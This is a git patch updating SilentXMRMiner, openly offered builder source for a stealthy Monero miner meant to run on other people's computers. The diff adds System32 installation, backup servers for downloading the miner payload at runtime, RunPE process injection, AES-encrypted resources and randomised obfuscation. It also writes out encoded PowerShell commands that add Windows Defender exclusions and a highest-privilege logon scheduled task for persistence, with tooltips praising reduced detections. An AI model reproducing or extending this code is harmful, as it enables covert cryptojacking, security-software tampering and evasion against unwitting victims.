From 1b5c1951a1b5dd14fcba5eecf3b4959648561438 Mon Sep 17 00:00:00 2001 From: UnamSanctam Date: Sat, 10 Jul 2021 21:55:06 +0200 Subject: [PATCH] Updated to v1.4.1 * Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners * Added backup servers for Online Downloader * Added Install to System32 option (requires administrator permissions) * Moved RunPE injector (Mandark) into miner to avoid internal Assembly.Load and improved it a bit * Fixed possiblity of duplicate random obfuscation strings * Improved Loader * Improved Watchdog * Improved obfuscation --- README.md | 13 +- SilentXMRMiner/Advanced.Designer.vb | 288 +++++++++++------- SilentXMRMiner/Advanced.resx | 5 + SilentXMRMiner/Advanced.vb | 17 ++ SilentXMRMiner/Codedom.vb | 41 ++- SilentXMRMiner/Form1.Designer.vb | 4 +- SilentXMRMiner/Form1.vb | 25 +- .../My Project/Resources.Designer.vb | 30 +- SilentXMRMiner/My Project/Resources.resx | 3 - SilentXMRMiner/Resources/Loader.cs | 28 +- SilentXMRMiner/Resources/Mandark.dll | Bin 6656 -> 0 bytes SilentXMRMiner/Resources/Program.cs | 190 +++++++++--- SilentXMRMiner/Resources/Uninstaller.cs | 11 +- SilentXMRMiner/Resources/Watchdog.cs | 66 ++-- .../Silent XMR Miner Builder.vbproj | 3 - 15 files changed, 479 insertions(+), 245 deletions(-) delete mode 100644 SilentXMRMiner/Resources/Mandark.dll diff --git a/README.md b/README.md index d123276..5223477 100644 --- a/README.md +++ b/README.md @@ -1,7 +1,7 @@ -# SilentXMRMiner v1.4 - Based on Lime Miner v0.3 +# SilentXMRMiner v1.4.1 - Based on Lime Miner v0.3 Can mine all the following algorithms and thus all the cryptocurrencies that use them: **cn/upx2**, **argon2/chukwav2**, **cn/ccx**, **kawpow**, **rx/keva**, **astrobwt**, **cn-pico/tlo**, **rx/sfx**, **rx/arq**, **rx/0**, **argon2/chukwa**, **argon2/wrkz**, **rx/wow**, **cn/fast**, **cn/rwz**, **cn/zls**, **cn/double**, **cn/r**, **cn-pico**, **cn/half**, **cn/2**, **cn/xao**, **cn/rto**, **cn-heavy/tube**, **cn-heavy/xhv**, **cn-heavy/0**, **cn/1**, **cn-lite/1**, **cn-lite/0** and **cn/0**. @@ -41,8 +41,17 @@ You can find the new wiki [here](https://github.com/UnamSanctam/SilentXMRMiner/w ## Changes +### v1.4.1 (10/07/2021) +* Fixed possible critical bug that makes the miner unable to see if a miner is running or not thus opening multiple miners +* Added backup servers for Online Downloader +* Added Install to System32 option (requires administrator permissions) +* Moved RunPE injector (Mandark) into miner to avoid internal Assembly.Load and improved it a bit +* Fixed possiblity of duplicate random obfuscation strings +* Improved Loader +* Improved Watchdog +* Improved obfuscation ### v1.4 (05/07/2021) -**v1.4 is the final update before the new, greatly improved unified miner that I'm working on.** +**v1.4.\* is the final update before the new, greatly improved unified miner that I'm working on.** * Added the Online Downloader option that makes the miner download the miner binary (from GitHub) during runtime to greatly decrease file size (to less then 100kb) and detections - Also added a cache so that it won't have to download the miner on every start * Made the Task Scheduler task start for all users * Improved Watchdog program flow diff --git a/SilentXMRMiner/Advanced.Designer.vb b/SilentXMRMiner/Advanced.Designer.vb index 030e86c..eacc58c 100644 --- a/SilentXMRMiner/Advanced.Designer.vb +++ b/SilentXMRMiner/Advanced.Designer.vb @@ -25,32 +25,37 @@ Partial Class Advanced Me.components = New System.ComponentModel.Container() Dim resources As System.ComponentModel.ComponentResourceManager = New System.ComponentModel.ComponentResourceManager(GetType(Advanced)) Me.TooltipHelper = New System.Windows.Forms.ToolTip(Me.components) - Me.Label26 = New System.Windows.Forms.Label() - Me.Label19 = New System.Windows.Forms.Label() - Me.Label1 = New System.Windows.Forms.Label() - Me.Label3 = New System.Windows.Forms.Label() - Me.Label6 = New System.Windows.Forms.Label() - Me.Label9 = New System.Windows.Forms.Label() - Me.Label11 = New System.Windows.Forms.Label() Me.MephTheme1 = New SilentXMRMiner.MephTheme() + Me.PictureBox2 = New System.Windows.Forms.PictureBox() + Me.Label7 = New System.Windows.Forms.Label() + Me.Label8 = New System.Windows.Forms.Label() + Me.toggleInstallSystem32 = New SilentXMRMiner.MephToggleSwitch() + Me.Label11 = New System.Windows.Forms.Label() Me.Label12 = New System.Windows.Forms.Label() Me.toggleDownloader = New SilentXMRMiner.MephToggleSwitch() + Me.Label9 = New System.Windows.Forms.Label() Me.Label10 = New System.Windows.Forms.Label() Me.toggleAdministrator = New SilentXMRMiner.MephToggleSwitch() Me.PictureBox1 = New System.Windows.Forms.PictureBox() + Me.Label26 = New System.Windows.Forms.Label() Me.Label27 = New System.Windows.Forms.Label() Me.toggleEnableDebug = New SilentXMRMiner.MephToggleSwitch() Me.Label20 = New System.Windows.Forms.Label() + Me.Label19 = New System.Windows.Forms.Label() Me.chkAdvanced = New SilentXMRMiner.MephCheckBox() Me.txtAdvParam = New SilentXMRMiner.MephTextBox() + Me.Label1 = New System.Windows.Forms.Label() Me.Label2 = New System.Windows.Forms.Label() Me.toggleObfuscation = New SilentXMRMiner.MephToggleSwitch() + Me.Label3 = New System.Windows.Forms.Label() Me.Label4 = New System.Windows.Forms.Label() Me.toggleKillWD = New SilentXMRMiner.MephToggleSwitch() Me.Label5 = New System.Windows.Forms.Label() + Me.Label6 = New System.Windows.Forms.Label() Me.chkRemoteConfig = New SilentXMRMiner.MephCheckBox() Me.txtRemoteConfig = New SilentXMRMiner.MephTextBox() Me.MephTheme1.SuspendLayout() + CType(Me.PictureBox2, System.ComponentModel.ISupportInitialize).BeginInit() CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).BeginInit() Me.SuspendLayout() ' @@ -63,116 +68,15 @@ Partial Class Advanced Me.TooltipHelper.IsBalloon = True Me.TooltipHelper.ReshowDelay = 100 ' - 'Label26 - ' - Me.Label26.AutoSize = True - Me.Label26.BackColor = System.Drawing.Color.Transparent - Me.Label26.Cursor = System.Windows.Forms.Cursors.Help - Me.Label26.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label26.ForeColor = System.Drawing.Color.Teal - Me.Label26.Location = New System.Drawing.Point(59, 280) - Me.Label26.Name = "Label26" - Me.Label26.Size = New System.Drawing.Size(13, 13) - Me.Label26.TabIndex = 60 - Me.Label26.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label26, "Will enable DEBUG mode which will display errors when they occur in the miner. !W" & - "ARNING! Should only be used when testing!") - ' - 'Label19 - ' - Me.Label19.AutoSize = True - Me.Label19.BackColor = System.Drawing.Color.Transparent - Me.Label19.Cursor = System.Windows.Forms.Cursors.Help - Me.Label19.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label19.ForeColor = System.Drawing.Color.Teal - Me.Label19.Location = New System.Drawing.Point(379, 236) - Me.Label19.Name = "Label19" - Me.Label19.Size = New System.Drawing.Size(13, 13) - Me.Label19.TabIndex = 66 - Me.Label19.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label19, "The parameters to mine with. ONLY CHANGE THESE IF YOU KNOW WHAT YOU ARE DOING.") - ' - 'Label1 - ' - Me.Label1.AutoSize = True - Me.Label1.BackColor = System.Drawing.Color.Transparent - Me.Label1.Cursor = System.Windows.Forms.Cursors.Help - Me.Label1.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label1.ForeColor = System.Drawing.Color.Teal - Me.Label1.Location = New System.Drawing.Point(146, 78) - Me.Label1.Name = "Label1" - Me.Label1.Size = New System.Drawing.Size(13, 13) - Me.Label1.TabIndex = 70 - Me.Label1.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip")) - ' - 'Label3 - ' - Me.Label3.AutoSize = True - Me.Label3.BackColor = System.Drawing.Color.Transparent - Me.Label3.Cursor = System.Windows.Forms.Cursors.Help - Me.Label3.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label3.ForeColor = System.Drawing.Color.Teal - Me.Label3.Location = New System.Drawing.Point(173, 168) - Me.Label3.Name = "Label3" - Me.Label3.Size = New System.Drawing.Size(13, 13) - Me.Label3.TabIndex = 73 - Me.Label3.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label3, "Will run commands to exclude the general folders that the miner uses or can use. " & - "This is good to enable to bypass future detections." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This command requires Admin" & - "istrator privileges!" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10)) - ' - 'Label6 - ' - Me.Label6.AutoSize = True - Me.Label6.BackColor = System.Drawing.Color.Transparent - Me.Label6.Cursor = System.Windows.Forms.Cursors.Help - Me.Label6.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label6.ForeColor = System.Drawing.Color.Teal - Me.Label6.Location = New System.Drawing.Point(378, 163) - Me.Label6.Name = "Label6" - Me.Label6.Size = New System.Drawing.Size(13, 13) - Me.Label6.TabIndex = 76 - Me.Label6.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip")) - ' - 'Label9 - ' - Me.Label9.AutoSize = True - Me.Label9.BackColor = System.Drawing.Color.Transparent - Me.Label9.Cursor = System.Windows.Forms.Cursors.Help - Me.Label9.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label9.ForeColor = System.Drawing.Color.Teal - Me.Label9.Location = New System.Drawing.Point(140, 138) - Me.Label9.Name = "Label9" - Me.Label9.Size = New System.Drawing.Size(13, 13) - Me.Label9.TabIndex = 84 - Me.Label9.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label9, "Will make the miner ask for administrator privileges to run." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This is required fo" & - "r the Bypass Windows Defender option. This option will also increase the hashrat" & - "e.") - ' - 'Label11 - ' - Me.Label11.AutoSize = True - Me.Label11.BackColor = System.Drawing.Color.Transparent - Me.Label11.Cursor = System.Windows.Forms.Cursors.Help - Me.Label11.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) - Me.Label11.ForeColor = System.Drawing.Color.Teal - Me.Label11.Location = New System.Drawing.Point(119, 108) - Me.Label11.Name = "Label11" - Me.Label11.Size = New System.Drawing.Size(13, 13) - Me.Label11.TabIndex = 87 - Me.Label11.Text = "?" - Me.TooltipHelper.SetToolTip(Me.Label11, "Enable this to download the miner from online (GitHub) instead of embedding it in" & - " the file." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This will greatly decrease the file size and usually greatly decreas" & - "es detections.") - ' 'MephTheme1 ' Me.MephTheme1.AccentColor = System.Drawing.Color.DarkRed Me.MephTheme1.Anchor = System.Windows.Forms.AnchorStyles.None Me.MephTheme1.BackColor = System.Drawing.Color.FromArgb(CType(CType(28, Byte), Integer), CType(CType(28, Byte), Integer), CType(CType(28, Byte), Integer)) + Me.MephTheme1.Controls.Add(Me.PictureBox2) + Me.MephTheme1.Controls.Add(Me.Label7) + Me.MephTheme1.Controls.Add(Me.Label8) + Me.MephTheme1.Controls.Add(Me.toggleInstallSystem32) Me.MephTheme1.Controls.Add(Me.Label11) Me.MephTheme1.Controls.Add(Me.Label12) Me.MephTheme1.Controls.Add(Me.toggleDownloader) @@ -205,6 +109,72 @@ Partial Class Advanced Me.MephTheme1.TabIndex = 0 Me.MephTheme1.Text = "Silent XMR Miner Builder" ' + 'PictureBox2 + ' + Me.PictureBox2.BackColor = System.Drawing.Color.Transparent + Me.PictureBox2.Image = Global.SilentXMRMiner.My.Resources.Resources.microsoft_admin + Me.PictureBox2.Location = New System.Drawing.Point(242, 196) + Me.PictureBox2.Name = "PictureBox2" + Me.PictureBox2.Size = New System.Drawing.Size(20, 20) + Me.PictureBox2.SizeMode = System.Windows.Forms.PictureBoxSizeMode.StretchImage + Me.PictureBox2.TabIndex = 91 + Me.PictureBox2.TabStop = False + ' + 'Label7 + ' + Me.Label7.AutoSize = True + Me.Label7.BackColor = System.Drawing.Color.Transparent + Me.Label7.Cursor = System.Windows.Forms.Cursors.Help + Me.Label7.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label7.ForeColor = System.Drawing.Color.Teal + Me.Label7.Location = New System.Drawing.Point(127, 198) + Me.Label7.Name = "Label7" + Me.Label7.Size = New System.Drawing.Size(13, 13) + Me.Label7.TabIndex = 90 + Me.Label7.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label7, resources.GetString("Label7.ToolTip")) + ' + 'Label8 + ' + Me.Label8.AutoSize = True + Me.Label8.BackColor = System.Drawing.Color.Transparent + Me.Label8.Font = New System.Drawing.Font("Segoe UI", 9.5!) + Me.Label8.ForeColor = System.Drawing.Color.Gray + Me.Label8.Location = New System.Drawing.Point(10, 195) + Me.Label8.Margin = New System.Windows.Forms.Padding(2, 0, 2, 0) + Me.Label8.Name = "Label8" + Me.Label8.Size = New System.Drawing.Size(119, 17) + Me.Label8.TabIndex = 89 + Me.Label8.Text = "Install to System32:" + ' + 'toggleInstallSystem32 + ' + Me.toggleInstallSystem32.BackColor = System.Drawing.Color.Transparent + Me.toggleInstallSystem32.Checked = False + Me.toggleInstallSystem32.ForeColor = System.Drawing.Color.Black + Me.toggleInstallSystem32.Location = New System.Drawing.Point(189, 193) + Me.toggleInstallSystem32.Margin = New System.Windows.Forms.Padding(2) + Me.toggleInstallSystem32.Name = "toggleInstallSystem32" + Me.toggleInstallSystem32.Size = New System.Drawing.Size(50, 24) + Me.toggleInstallSystem32.TabIndex = 88 + Me.toggleInstallSystem32.Text = "Enable Nicehash Mining" + ' + 'Label11 + ' + Me.Label11.AutoSize = True + Me.Label11.BackColor = System.Drawing.Color.Transparent + Me.Label11.Cursor = System.Windows.Forms.Cursors.Help + Me.Label11.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label11.ForeColor = System.Drawing.Color.Teal + Me.Label11.Location = New System.Drawing.Point(119, 108) + Me.Label11.Name = "Label11" + Me.Label11.Size = New System.Drawing.Size(13, 13) + Me.Label11.TabIndex = 87 + Me.Label11.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label11, "Enable this to download the miner from online (GitHub) instead of embedding it in" & + " the file." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This will greatly decrease the file size and usually greatly decreas" & + "es detections.") + ' 'Label12 ' Me.Label12.AutoSize = True @@ -230,6 +200,22 @@ Partial Class Advanced Me.toggleDownloader.TabIndex = 85 Me.toggleDownloader.Text = "Enable Nicehash Mining" ' + 'Label9 + ' + Me.Label9.AutoSize = True + Me.Label9.BackColor = System.Drawing.Color.Transparent + Me.Label9.Cursor = System.Windows.Forms.Cursors.Help + Me.Label9.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label9.ForeColor = System.Drawing.Color.Teal + Me.Label9.Location = New System.Drawing.Point(140, 138) + Me.Label9.Name = "Label9" + Me.Label9.Size = New System.Drawing.Size(13, 13) + Me.Label9.TabIndex = 84 + Me.Label9.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label9, "Will make the miner ask for administrator privileges to run." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This is required fo" & + "r the Bypass Windows Defender option. This option will also increase the hashrat" & + "e.") + ' 'Label10 ' Me.Label10.AutoSize = True @@ -266,6 +252,21 @@ Partial Class Advanced Me.PictureBox1.TabIndex = 81 Me.PictureBox1.TabStop = False ' + 'Label26 + ' + Me.Label26.AutoSize = True + Me.Label26.BackColor = System.Drawing.Color.Transparent + Me.Label26.Cursor = System.Windows.Forms.Cursors.Help + Me.Label26.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label26.ForeColor = System.Drawing.Color.Teal + Me.Label26.Location = New System.Drawing.Point(59, 280) + Me.Label26.Name = "Label26" + Me.Label26.Size = New System.Drawing.Size(13, 13) + Me.Label26.TabIndex = 60 + Me.Label26.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label26, "Will enable DEBUG mode which will display errors when they occur in the miner. !W" & + "ARNING! Should only be used when testing!") + ' 'Label27 ' Me.Label27.AutoSize = True @@ -303,6 +304,20 @@ Partial Class Advanced Me.Label20.TabIndex = 67 Me.Label20.Text = "Advanced Parameters:" ' + 'Label19 + ' + Me.Label19.AutoSize = True + Me.Label19.BackColor = System.Drawing.Color.Transparent + Me.Label19.Cursor = System.Windows.Forms.Cursors.Help + Me.Label19.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label19.ForeColor = System.Drawing.Color.Teal + Me.Label19.Location = New System.Drawing.Point(379, 236) + Me.Label19.Name = "Label19" + Me.Label19.Size = New System.Drawing.Size(13, 13) + Me.Label19.TabIndex = 66 + Me.Label19.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label19, "The parameters to mine with. ONLY CHANGE THESE IF YOU KNOW WHAT YOU ARE DOING.") + ' 'chkAdvanced ' Me.chkAdvanced.AccentColor = System.Drawing.Color.ForestGreen @@ -333,6 +348,20 @@ Partial Class Advanced Me.txtAdvParam.UseSystemPasswordChar = False Me.txtAdvParam.WordWrap = False ' + 'Label1 + ' + Me.Label1.AutoSize = True + Me.Label1.BackColor = System.Drawing.Color.Transparent + Me.Label1.Cursor = System.Windows.Forms.Cursors.Help + Me.Label1.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label1.ForeColor = System.Drawing.Color.Teal + Me.Label1.Location = New System.Drawing.Point(146, 78) + Me.Label1.Name = "Label1" + Me.Label1.Size = New System.Drawing.Size(13, 13) + Me.Label1.TabIndex = 70 + Me.Label1.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label1, resources.GetString("Label1.ToolTip")) + ' 'Label2 ' Me.Label2.AutoSize = True @@ -358,6 +387,22 @@ Partial Class Advanced Me.toggleObfuscation.TabIndex = 68 Me.toggleObfuscation.Text = "Enable Nicehash Mining" ' + 'Label3 + ' + Me.Label3.AutoSize = True + Me.Label3.BackColor = System.Drawing.Color.Transparent + Me.Label3.Cursor = System.Windows.Forms.Cursors.Help + Me.Label3.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label3.ForeColor = System.Drawing.Color.Teal + Me.Label3.Location = New System.Drawing.Point(173, 168) + Me.Label3.Name = "Label3" + Me.Label3.Size = New System.Drawing.Size(13, 13) + Me.Label3.TabIndex = 73 + Me.Label3.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label3, "Will run commands to exclude the general folders that the miner uses or can use. " & + "This is good to enable to bypass future detections." & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10) & "This command requires Admin" & + "istrator privileges!" & Global.Microsoft.VisualBasic.ChrW(13) & Global.Microsoft.VisualBasic.ChrW(10)) + ' 'Label4 ' Me.Label4.AutoSize = True @@ -395,6 +440,20 @@ Partial Class Advanced Me.Label5.TabIndex = 77 Me.Label5.Text = "Remote Configuration:" ' + 'Label6 + ' + Me.Label6.AutoSize = True + Me.Label6.BackColor = System.Drawing.Color.Transparent + Me.Label6.Cursor = System.Windows.Forms.Cursors.Help + Me.Label6.Font = New System.Drawing.Font("Microsoft Sans Serif", 8.25!, System.Drawing.FontStyle.Underline) + Me.Label6.ForeColor = System.Drawing.Color.Teal + Me.Label6.Location = New System.Drawing.Point(378, 163) + Me.Label6.Name = "Label6" + Me.Label6.Size = New System.Drawing.Size(13, 13) + Me.Label6.TabIndex = 76 + Me.Label6.Text = "?" + Me.TooltipHelper.SetToolTip(Me.Label6, resources.GetString("Label6.ToolTip")) + ' 'chkRemoteConfig ' Me.chkRemoteConfig.AccentColor = System.Drawing.Color.ForestGreen @@ -444,6 +503,7 @@ Partial Class Advanced Me.TransparencyKey = System.Drawing.Color.Fuchsia Me.MephTheme1.ResumeLayout(False) Me.MephTheme1.PerformLayout() + CType(Me.PictureBox2, System.ComponentModel.ISupportInitialize).EndInit() CType(Me.PictureBox1, System.ComponentModel.ISupportInitialize).EndInit() Me.ResumeLayout(False) @@ -475,4 +535,8 @@ Partial Class Advanced Friend WithEvents Label11 As Label Friend WithEvents Label12 As Label Friend WithEvents toggleDownloader As MephToggleSwitch + Friend WithEvents PictureBox2 As PictureBox + Friend WithEvents Label7 As Label + Friend WithEvents Label8 As Label + Friend WithEvents toggleInstallSystem32 As MephToggleSwitch End Class diff --git a/SilentXMRMiner/Advanced.resx b/SilentXMRMiner/Advanced.resx index 7293b0f..bca8869 100644 --- a/SilentXMRMiner/Advanced.resx +++ b/SilentXMRMiner/Advanced.resx @@ -120,6 +120,11 @@ 17, 17 + + Will try to install to System32, if unsuccessful it will try to install to the path chosen in the "Install" tab. It's recommended to enable this when using 'Run as Administrator'. +This command requires Administrator privileges! + + Pauses the miner compilation when the Watchdog DLL and/or Miner DLL is compiled to allow manual obfuscation of the file. You can find the file in the same folder as the miner location you specified with the name MINERFILE-watchdog.dll or MINERFILE-miner.dll. diff --git a/SilentXMRMiner/Advanced.vb b/SilentXMRMiner/Advanced.vb index 04df9a3..9cb9a34 100644 --- a/SilentXMRMiner/Advanced.vb +++ b/SilentXMRMiner/Advanced.vb @@ -30,6 +30,23 @@ Private Sub toggleKillWD_CheckedChanged(sender As Object) Handles toggleKillWD.CheckedChanged If toggleKillWD.Checked Then toggleAdministrator.Checked = True + toggleInstallSystem32.Checked = True + End If + End Sub + + Private Sub toggleInstallSystem32_CheckedChanged(sender As Object) Handles toggleInstallSystem32.CheckedChanged + If toggleInstallSystem32.Checked Then + toggleAdministrator.Checked = True + End If + End Sub + + Private Sub toggleAdministrator_CheckedChanged(sender As Object) Handles toggleAdministrator.CheckedChanged + If toggleAdministrator.Checked Then + toggleInstallSystem32.Checked = True + toggleKillWD.Checked = True + Else + toggleInstallSystem32.Checked = False + toggleKillWD.Checked = False End If End Sub End Class \ No newline at end of file diff --git a/SilentXMRMiner/Codedom.vb b/SilentXMRMiner/Codedom.vb index cc1b24f..f2d9e60 100644 --- a/SilentXMRMiner/Codedom.vb +++ b/SilentXMRMiner/Codedom.vb @@ -10,6 +10,8 @@ Public Class Codedom Public Shared LoaderOK As Boolean = False Public Shared UninstallerOK As Boolean = False Public Shared F As Form1 + + Public Shared GlobalRProgram As String Public Shared Sub MinerCompiler(ByVal Path As String, ByVal Code As String, ByVal Res As String) MinerOK = False @@ -17,7 +19,9 @@ Public Class Codedom providerOptions.Add("CompilerVersion", "v4.0") Dim CodeProvider As New CSharpCodeProvider(providerOptions) Dim Parameters As New CompilerParameters - Dim OP As String = " /target:library /platform:x64 /optimize " + Dim OP As String = " /target:winexe /platform:x64 /optimize " + + GlobalRProgram = F.Randomi(F.rand.Next(5, 40)) With Parameters .GenerateExecutable = False @@ -36,7 +40,6 @@ Public Class Codedom F.txtLog.Text = F.txtLog.Text + ("Creating resources..." + vbNewLine) Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Res + ".Resources") - R.AddResource(F.Resources_dll, F.AES_Encryptor(My.Resources.Mandark)) If Not F.FA.toggleDownloader.Checked Then R.AddResource(F.Resources_xmrig, F.AES_Encryptor(My.Resources.xmrig)) End If @@ -79,7 +82,9 @@ Public Class Codedom providerOptions.Add("CompilerVersion", "v4.0") Dim CodeProvider As New CSharpCodeProvider(providerOptions) Dim Parameters As New CompilerParameters - Dim OP As String = " /target:library /platform:x64 /optimize " + Dim OP As String = " /target:winexe /platform:x64 /optimize " + + GlobalRProgram = F.Randomi(F.rand.Next(5, 40)) With Parameters .GenerateExecutable = False @@ -150,7 +155,7 @@ Public Class Codedom Dim Resources_Loader = F.Randomi(rand.Next(5, 40)) Using R As New Resources.ResourceWriter(IO.Path.GetTempPath & "\" + Resources_Loader + ".Resources") - R.AddResource(Resources_Program, ProgramBytes.Reverse().ToArray()) + R.AddResource(Resources_Program, F.AES_Encryptor(ProgramBytes)) R.Generate() End Using @@ -233,7 +238,7 @@ Public Class Codedom Public Shared Sub ReplaceGlobals(ByRef stringb As StringBuilder) If F.FA.toggleKillWD.Checked Then stringb.Replace("DefKillWD", "true") - stringb.Replace("#KillWDCommands", Convert.ToBase64String(Encoding.ASCII.GetBytes("powershell -Command Add-MpPreference -ExclusionPath '%cd%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & exit").Reverse().ToArray())) + stringb.Replace("#KillWDCommands", F.EncryptString("/c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit")) End If If F.FA.toggleEnableDebug.Checked Then @@ -264,7 +269,13 @@ Public Class Codedom installdir = "Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)" End Select - stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & "," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")") + If F.FA.toggleInstallSystem32.Checked Then + stringb.Replace("DefSystem32", "true") + stringb.Replace("PayloadPath", "System.IO.Path.Combine((new WindowsPrincipal(WindowsIdentity.GetCurrent()).IsInRole(WindowsBuiltInRole.Administrator) ? Environment.SystemDirectory : " & installdir & ")," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")") + Else + stringb.Replace("PayloadPath", "System.IO.Path.Combine(" & installdir & "," & Chr(34) & F.txtInstallFileName.Text & Chr(34) & ")") + End If + If F.toggleWatchdog.Checked Then stringb.Replace("DefWatchdog", "true") @@ -288,18 +299,20 @@ Public Class Codedom stringb.Replace("%Guid%", Guid.NewGuid.ToString) - stringb.Replace("#STARTDELAY", F.txtStartDelay.Text) stringb.Replace("#KEY", F.AESKEY) stringb.Replace("#SALT", F.SALT) stringb.Replace("#IV", F.IV) stringb.Replace("#DLLSTR", F.EncryptString("Mandark.Mandark")) stringb.Replace("#DLLOAD", F.EncryptString("Load")) stringb.Replace("#REGKEY", F.EncryptString("Software\Microsoft\Windows\CurrentVersion\Run\")) + stringb.Replace("#SANCTAMLIBSURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=libs")) + stringb.Replace("#SANCTAMMINERURL", F.EncryptString("https://sanctam.net:58899/assets/txt/resource_url.php?type=xmrig")) stringb.Replace("#LIBSURL", F.EncryptString("https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/libs.zip")) stringb.Replace("#MINERURL", F.EncryptString("https://github.com/UnamSanctam/SilentXMRMiner/raw/master/SilentXMRMiner/Resources/xmrig.zip")) stringb.Replace("#LIBSPATH", F.EncryptString("Microsoft\Libs\")) stringb.Replace("#WATCHDOG", F.EncryptString("sihost64")) stringb.Replace("#TASKSCH", F.EncryptString("/c schtasks /create /f /sc onlogon /rl highest /tn ")) + stringb.Replace("#MINERID", F.EncryptString("--cinit-find-x")) stringb.Replace("#InjectionTarget", F.EncryptString(F.InjectionTarget(0))) stringb.Replace("#InjectionDir", F.InjectionTarget(1).Replace("(", "").Replace(")", "").Replace("%WINDIR%", """ + Environment.GetFolderPath(Environment.SpecialFolder.Windows) + """)) @@ -315,12 +328,26 @@ Public Class Codedom stringb.Replace("RTruncate", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("RCommandLineEncrypt", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("RWDLoop", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("RStart", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("RLoader", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("RUninstaller", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("RProgram", GlobalRProgram) stringb.Replace("rarg1", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("rarg2", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("rarg3", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rarg4", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rarg5", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rarg6", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rarg7", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rarg8", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rarg9", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rarg10", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rarg11", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("rbD", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("rbD2", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("rplp", F.Randomi(F.rand.Next(5, 40))) stringb.Replace("rxM", F.Randomi(F.rand.Next(5, 40))) + stringb.Replace("startDelay", F.txtStartDelay.Text) End Sub End Class diff --git a/SilentXMRMiner/Form1.Designer.vb b/SilentXMRMiner/Form1.Designer.vb index 1e7b6a7..319b3fd 100644 --- a/SilentXMRMiner/Form1.Designer.vb +++ b/SilentXMRMiner/Form1.Designer.vb @@ -346,7 +346,7 @@ Partial Class Form1 Me.MephForm1.Size = New System.Drawing.Size(535, 272) 